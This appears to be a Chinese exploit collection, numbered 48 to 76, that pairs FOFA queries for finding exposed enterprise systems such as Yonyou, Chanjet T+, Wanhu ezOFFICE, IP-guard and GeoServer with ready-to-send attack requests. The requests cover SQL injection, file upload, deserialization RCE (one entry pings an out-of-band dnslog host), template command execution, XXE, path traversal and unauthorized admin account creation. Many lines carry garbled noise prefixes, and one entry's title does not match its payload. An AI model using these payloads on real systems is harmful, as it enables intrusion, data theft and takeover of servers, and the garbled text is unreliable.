User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 g3 f3 O7 \  p% i# Z* K8 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
+ Q, m# ~$ G- t5 fConnection: close
& Y# o9 g% t6 Y* ~( g7 q/ b" o

8 E$ B9 |8 V: y7 n4 h
48. 用友U8 CRM swfupload 任意文件上传
( z' o* }6 w  s9 {7 eFOFA：title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- M* c/ K6 A, N1 X+ _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: O+ V' r) P. c/ m7 T- hAccept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
6 g: I7 y2 i2 H" u1 ]# KContent-Disposition: form-data; name="file"; filename="s.php"
1231
  {9 t7 O/ J4 H% h% LContent-Type: application/octet-stream
6 X5 m. V" \7 P+ O5 g( z1 t------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
# b, d3 r0 h+ x, C9 a. R$ c------269520967239406871642430066855--


) |. A- p- i; G* r49. 用友U8 CRM系统uploadfile.php接口任意文件上传
FOFA：body="用友U8CRM"
& F; Y) a7 h+ P/ ]
, a+ A( o# j' f1 bPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
% w! _/ t3 o* A* ?Host: x.x.x.x
, ~- D3 Z3 Y" g3 n" K4 C# l* sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) _; S3 U* e) K2 AContent-Length: 329
; {1 n) k' `# y; S. O# TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
! b$ \  b, K# C7 Z1 |+ d! a( XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# d, @& x1 A# B3 y9 x. C: D. f' H  {6 k
" [5 m# `9 W  s# M-----------------------------vvv3wdayqv3yppdxvn3w
# l+ Y0 l8 h- r% ^% xContent-Disposition: form-data; name="file"; filename="%s.php "
% P$ ?% J- f( L9 ~8 E* HContent-Type: application/octet-stream
+ f$ [; N! ^' Z, g3 z. R/ C( E  W
2 U! V, J8 D: Qwersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
' @1 }3 S) k; c% Y* v2 ?-----------------------------vvv3wdayqv3yppdxvn3w--
. F' c3 S: u; I9 v; f. G; P
/ |0 L/ I2 _* ~8 W, }6 H0 N
5 e& j7 h" A% x3 @$ f# O, w$ zhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
8 ~  E8 a9 a$ r, t( N
50. QDocs Smart School 6.4.1 filterRecords SQL注入
FOFA：body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
7 n& j7 C' `% y$ c$ K% R) e0 DHost: x.x.x.x
3 N5 F/ c! L/ u8 V0 u8 {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
8 i6 A! W" e5 }8 vContent-Length: 224
) A3 o& h* K( {; g: n# U* l. s6 HAccept: */*
Accept-Language: en
0 h! `! b/ F0 Q) @7 l5 SContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

! `7 Z* ]+ z+ q; Z) X
: I9 F2 I4 f. W1 S5 ^51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
FOFA：app="云时空社会化商业ERP系统"
: L* u" O! r! Y0 o( k/ FGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 F4 F+ N9 Q9 GHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3 t) ]( S" D" ^
: V% |! D8 _6 T4 u* M; Y0 W2 G& a
52. 泛微E-Office json_common.php sql注入
FOFA：app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
( ]6 J" D9 Q4 v) K$ i# J) FHost: 192.168.86.128:8097
# X& _4 d5 d" t) ]3 @& P' o9 gUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. j  I2 _. o6 v: c* KConnection: close
' j; n7 B) y- T/ f6 oContent-Length: 87
Accept: */*
" p( j/ U8 h. h! v: A5 V! R; K8 sAccept-Language: en
Content-Type: application/x-www-form-urlencoded
5 {  p( B8 p  _. T1 H. DAccept-Encoding: gzip
" F/ u0 `1 X" _. q' [- \* T- K
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

7 X. ~5 A( O8 G& y3 r+ q2 c  S
53. 迪普 DPTech VPN Service 任意文件上传
FOFA：app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
4 X5 y: }/ }( y7 X7 E5 Y; |* a% c
' ~. h! L; u/ \% }2 t% ]- W
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
9 g9 S& {; E" |6 aFOFA：app="畅捷通-TPlus"
% p0 _. K7 d! j; ]: _; t9 P8 k第一步，向目标发送数据包，执行命令，将指定字符串写入指定文件
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


. l2 _% _5 U3 A9 R完整数据包
2 c4 A8 k; R( D3 X9 `9 b  YPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
3 h1 u+ x. L7 XContent-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 R( f" b" s; K! W% w. M "MethodName":"Start",
  "ObjectInstance":{
9 G- W4 [$ Q7 g1 g2 ]) u   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 s/ q9 `: [6 ?" U. _3 s) G4 l    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
3 s, M5 e# c' b9 A& b, _' \    }
3 F) K. ~3 @6 `6 {9 ?2 B6 X  }
  }
}


- H1 d0 ]3 r& V1 f第二步，访问如下url
9 ~0 ^6 [+ L9 e7 l/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

& l4 Z; x* G" l7 F+ q3 d" P8 g- L8 \1 Y
55. 畅捷通T+ getdecallusers信息泄露
1 [  N4 o, @  ~: s/ FFOFA：app="畅捷通-TPlus"
第一步，通过
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
3 u5 A- {2 J" }( R9 ^第二步，利用获取到的Cookie请求
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
# |# W0 @+ l8 x
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 `5 {3 c. H/ r, gFOFA: app="畅捷通-TPlus"
+ I7 e. L: X, Z$ Q2 dPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json
2 y0 R: L% u, n- H
& l: g: E( L& e9 O! g, v- r, L{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
( c! e9 l. r% u3 c$ J& O, t    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 Z  w  ~1 {6 q1 ?        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
3 q, T$ R: m3 h    }
  }
8 n$ p, m4 T, V* O9 t* H' Q}
) x% n  [+ b( e, _0 m" q

57. 畅捷通T+ keyEdit.aspx SQL注入
FOFA：app="畅捷通-TPlus"
8 y# {, d5 W3 t) P7 HGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
4 a  T# V- v- z+ jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
7 G( I. M- }/ o: k: o/ H# F8 {Accept-Encoding: gzip, deflate
Connection: close


3 r, `0 r8 l" u4 S% q7 _6 [/ j/ i  ~58. 畅捷通T+ KeyInfoList.aspx sql注入
FOFA：app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
% B( ?  p& X$ P9 WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
* i& Q$ D  F' }& h

2 w4 Z% G$ _* e* n! W59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" e0 t$ o- D% K$ q" TFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
' S( _- D, C+ x' f% wPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
$ v0 X% f- _! d2 fUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
6 U0 [2 `9 {2 ~7 AContent-Length: 1669
Accept: */*
7 u& }; e& P5 @$ t( YAccept-Language: en
" X- @6 O$ {5 n: \Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

' o7 t7 S: E3 f2 ]# vPAYLOAD
2 |5 Z! b4 s. y/ w" d1 X  Z$ A; i1 i

  c9 _5 H/ O& |( r; X, C. c60. 百卓Smart管理平台 importexport.php SQL注入
& {% E! V; s9 \  Z1 |: xFOFA：title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
8 \, ^4 S  Z/ u. J1 MHost:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 \5 |; Z6 J* t: {& _6 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% K; P- B6 H6 d6 W0 p2 G  X3 m) \1 NAccept-Encoding: gzip, deflate
" A, _8 ?: }2 k; \- rAccept-Language: zh-CN,zh;q=0.9
9 ]+ d  G5 h7 e! g) @Connection: close
! m2 g) S! r$ B7 }6 S8 Z- y! E, A

8 m: W( x: e: a61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
5 u" G% H! e* JContent-Length: 27
9 T: ]2 u% x& j! c/ b: t8 LAccept: */*
Accept-Encoding: gzip, deflate
& k# X+ K: b" c' m. `Accept-Language: en
Content-Type: application/x-www-form-urlencoded
, l+ E1 B& _2 s9 z$ h  ~
8uxssX66eqrqtKObcVa0kid98xa
# m; f! [7 `. Q2 l) ~; u8 E! B

  Z6 y' h# G( B* R62. IP-guard WebServer 远程命令执行
FOFA："IP-guard" && icon_hash="2030860561"
# V! Q9 v, S) {: @6 h8 LGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
* F) q1 T9 q7 u  J8 i; I3 q; o* [Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
$ R% A( ?" i, b8 e$ ^0 o: c* H  y: \Connection: close
Accept: */*
Accept-Language: en
2 M" n3 C* [0 c" s. d: sAccept-Encoding: gzip
: I1 B$ t2 V( ~3 q' M, `/ z

访问
* y6 N% H. D; k9 v- Q7 n* j2 @% @
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

% n: R  v" y' ~3 ?8 z# a
' C! |9 G) {5 x0 j63. IP-guard WebServer任意文件读取
' f/ \( F! r/ t  H% ^7 D: eIP-guard < 4.82.0609.0
FOFA：icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 N* [- p5 E! E7 d$ z* D8 i/ kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 o5 S# I- F$ nAccept-Encoding: gzip, deflate
5 c+ [7 Q6 X- x' S5 \! I" kAccept-Language: zh-CN,zh;q=0.9
8 n. ]6 \  A1 N& eConnection: close
  Y; {# Z3 e4 bContent-Type: application/x-www-form-urlencoded

- E' m+ z  d2 X7 Cpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统CWSFinanceCommon SQL注入
' k- F' Z8 b) C+ G  x5 g' h$ H. rFOFA：body="/Scripts/EnjoyMsg.js"
& H2 @& X( P) VPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
  o" Y- o, B7 U5 wHost: 192.168.86.128:9001
) i: e! U0 f1 }% v/ |# X+ CUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
  I4 o) V6 t( G$ WContent-Length: 369
Accept: */*
Accept-Language: en
8 e: Y* n7 ]- a6 ZContent-Type: text/xml; charset=utf-8
4 X: c) F5 s# l& {7 s' @3 E! UAccept-Encoding: gzip

- U0 e# K7 I* j1 h<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
* D, g) N; u$ c9 B+ q    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
9 b# I" {3 o# X4 a6 b    </GetOSpById>
  </soap:Body>
</soap:Envelope>
' N) I2 h% M  O* a
( z; z, z5 ^; W7 h. @0 p5 x
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ x! i0 ?7 \! j) E! t: GFOFA：title="欢迎使用脸爱云 一脸通智慧管理平台"
响应200即成功创建账号test123456/123456
POST /SystemMng.ashx HTTP/1.1
( x$ F, L" a2 |) Q, K- DHost:
& q- A1 X7 ?) G7 o: A! a/ c* ^User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
/ r2 G" u. M8 LAccept-Encoding: gzip, deflate
Accept: */*
Connection: close
; h4 w$ ^. u& ^1 O% s: XAccept-Language: en
Content-Length: 174

* h3 u- F3 l! V2 U( c) ?! DoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
9 L# Q! i4 V+ A) b+ n+ W4 C

" q2 e( E7 ?4 {4 D. `6 W, K. }" h66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
FOFA：app="万户ezOFFICE协同管理平台"

# b1 o# v0 N/ a: c/ ?* yGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
7 p2 L1 q" H8 D* i7 F1 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ P- R0 n1 i. TConnection: close
8 d- q7 x7 R; c0 g+ b$ ZAccept: */*
Accept-Language: en
/ Q! N. g$ y* }" k! \% KAccept-Encoding: gzip
, x; W& _- ~1 R' E/ y. R0 w

第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在

& F* W( Z3 ?$ F5 n- x67. 万户ezOFFICE wpsservlet任意文件上传
FOFA：app="万户网络-ezOFFICE"
newdocId和filename参数表示写入文件名称，dir参数表示写入文件的路径，fileType参数表示文件类型
0 ~0 M1 j* H% Y+ y! RPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
9 [; h8 }4 H  P7 ~7 }' vContent-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
! c! Y) g0 p" dAccept-Encoding: gzip, deflate
, ?7 b1 o' |6 U4 C% cAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 t* I* J9 b/ X* n; {$ ~Connection: close
& o4 k9 A7 n+ ]" V  S+ C9 T- jContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
) F, E  S1 ^' o0 b* M) r0 PDNT: 1
Upgrade-Insecure-Requests: 1
# M3 F' l6 r1 {
--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! J5 y3 m- w( _9 _8 Q/ o: @( y
<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--
$ O2 k, W- H0 q, u! l6 E
8 D7 P# v+ y8 ]' k" s3 |6 ^
/ l* o. o9 {3 O' q  L' E; n文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
9 b7 w2 L) X5 @0 Q9 s# e) U; e
7 V- Y1 r+ S9 H6 d. k/ J68. 万户ezOFFICE wf_printnum.jsp SQL注入
* [$ ~! s1 e: k' y& SFOFA：app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 g/ _; N& u% `) ]Host: {{host}}
- h. ]# H. E3 Y& c+ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
4 Y9 R$ ]1 J3 }0 y" G1 ~Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
# v3 j& D, m' o5 C# ]$ j) w& `Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 E+ D2 t# |# PFOFA：app="万户ezOFFICE协同管理平台"
8 F  k9 u- j6 S) p5 I4 ~; ZGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
! U+ b/ O! C, FHost: your-ip
1 i8 I( ~7 Y) ~& pUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 M6 e$ r$ W& H8 |Accept-Encoding: gzip, deflate
! ^7 n& z0 g& FAccept: */*
Connection: keep-alive


70. 万户ezEIP success 命令执行
. ~  v% W( X1 Y. R; rFOFA：app="万户网络-ezEIP"
# C: i" l' a, ~! {POST /member/success.aspx HTTP/1.1
: P, i  z; o1 k5 S) K+ X" _Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
, v+ K/ N: j& ^# H0 Y3 u' c! STYPE: C
Content-Length: 16702

5 Q' r% R- t/ `! e6 W__VIEWSTATE=PAYLOAD
* I) p5 \3 Y: A9 e

# V6 F0 ^. H) |71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
' ^4 m1 L" _: T- e, v) O' EFOFA：body="PM2项目管理系统BS版增强工具.zip"
7 w; q5 B4 ~. C6 W) _/ M8 s3 uGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
- [8 \* \$ Z  X. j$ {5 B) qHost: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 O8 e" H/ f3 t9 x" x+ g; MConnection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
  A7 h# k" A! I; X& j* w- yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ Y: O2 [' l& [+ d) OUpgrade-Insecure-Requests: 1
6 _; O1 g( Q- M4 X

0 v. F/ {' b7 R' ^0 [72. 致远OA getAjaxDataServlet XXE
* U& Q: r' g1 s0 O: zFOFA：app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
% l% f, {" p5 Y. ?) L7 y0 vContent-Length: 583
Content-Type: application/x-www-form-urlencoded
$ o. K4 w  `% l  P) iAccept-Encoding: gzip
. H6 s- o" d- E  F
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


( e" x% x+ j9 n8 @4 T: [73. GeoServer wms远程代码执行
FOFA：icon_hash=”97540678”
$ T" i+ a/ k" n. U8 v1 zPOST /geoserver/wms HTTP/1.1
/ A4 f" z9 @& }9 c( D+ VHost:
8 w' f& R& }# N2 k8 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; D. ^, A* E9 \( R& k  JContent-Length: 1981
  b# d9 U2 ]6 ^Accept-Encoding: gzip, deflate
6 T0 D2 s- x0 Q- j( p6 L& G1 g) gConnection: close
Content-Type: application/xml
- r  k* v* H: f$ tSL-CE-SUID: 3
/ o2 U6 h2 h# U9 Q$ G
PAYLOAD


74. 致远M3-server 6_1sp1 反序列化RCE
, L' U* g, o4 p2 k+ SFOFA：title="M3-Server"
9 W& y% N) `6 S& [' }  W0 a  VPAYLOAD
# |8 t& V- ?* `" q( X$ Q
' I: q9 w9 p8 W, V0 E75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
3 O# t% W5 U9 U. z4 E; e- hFOFA：app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ P! z/ N) t8 d. _Host: x.x.x.x
6 O# g- B' K9 z7 n& w2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 S7 r/ a# m5 i" QConnection: close
Accept: */*
+ l+ h- Q. t  @$ xAccept-Language: en
$ J1 u+ b) D. y$ l# D" w1 d% mAccept-Encoding: gzip
3 O4 `' \3 p% k: [0 z1 |0 Z" O5 h

GET /cgi-bin/test28256.txt HTTP/1.1
, q) V' g' Y4 k: i8 i; w- X, LHost: x.x.x.x
( A" c( h5 ~" X2 |" l

76. 新开普掌上校园服务管理平台service.action远程命令执行
FOFA：title="掌上校园服务管理平台"
4 r* u7 t0 v# P1 u6 f! K( ZPOST /service_transport/service.action HTTP/1.1
. Y( t2 ^4 s5 ], yHost: x.x.x.x
, e0 y2 O  i% X: ^9 }5 G' _! EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4 @: T& o% G1 u6 v( ~2 vConnection: close
Content-Length: 211
& A( ~* [- H. cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
5 H/ b; L8 i; y( D- qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
2 w2 P) Z, P( fUpgrade-Insecure-Requests: 1
) f% m4 e6 u; M' m' d* N; p0 U- B8 g
{
"command": "GetFZinfo",
2 b/ n. m+ N" w+ G& K8 F  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* Q9 {( i/ G/ ^2 k  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
5 E+ _$ U4 |! ?# V# N}
2 ]# w( s1 J+ O" D! v

1 D# w, \* M, _$ zGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
) B0 e4 ]2 l  X# [" zHost: x.x.x.x
+ k9 ^$ @) B' B0 b" S" M
* H/ g* ^. |  E0 q

